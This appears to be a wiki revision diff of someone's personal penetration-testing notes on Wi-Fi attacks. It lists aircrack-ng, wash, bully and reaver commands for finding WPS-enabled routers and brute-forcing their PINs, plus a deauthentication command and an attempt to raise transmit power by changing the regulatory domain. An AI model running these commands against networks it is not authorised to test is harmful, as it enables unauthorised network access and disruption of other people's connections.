User Tools

Site Tools


pentest:start

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision
Previous revision
pentest:start [2014/10/31 06:32] michaelurspringerpentest:start [2014/12/23 16:08] (current) michaelurspringer
Line 8: Line 8:
 === Crack WPS === === Crack WPS ===
  
-# Start monitor interface +# Start monitor interface\\ 
-airmon-ng start wlan0+airmon-ng start wlan0\\ 
 +\\ 
 +# Check for WLAN networks nearby\\ 
 +airodump-ng mon0\\ 
 +\\ 
 +# Check for WPS enabled devices\\ 
 +wash -i mon0 --ignore-fcs\\ 
 +\\ 
 +# Bully for bruteforce attack of WPS key\\ 
 +bully -B mon0 -o <outputfile> -b <BSSID>\\ 
 +Alternative:\\ 
 +reaver -i mon0 -vv -b <BSSID>\\
  
-# Check for WLAN networks nearby +=== Higher Power for Realtek RTL8187 Wifi Adapter === 
-airodump-ng mon0+ 
 +# Does not work!? \\ 
 +modprobe rtl8187\\ 
 +iw reg set B0\\ 
 +iw dev wlan0 set txpower auto\\ 
 +# check: \\ 
 +iwlist wlan 0 txpower | grep "Current"\\ 
 + 
 + 
 +=== Deauth client from AP === 
 + 
 +aireplay-ng -0 10 -a <BSSID AP> -c <BSSID CLient; optional> mon0 --ignore-negative-one 
 + 
 +=== Links === 
 + 
 +https://forums.hak5.org/index.php?/topic/33550-how-can-i-sniff-with-a-captive-portal/
  
-# Check for WPS enabled devices 
-wash -i mon0 --ignore-fcs 
  
-# Bully for bruteforce attack of WPS key 
-bully -B mon0 -o <outputfile> -b <BSSID> 
-        Alternative 
-reaver -i mon0 -vv -b <BSSID> 
pentest/start.1414733563.txt · Last modified: 2014/10/31 06:32 by michaelurspringer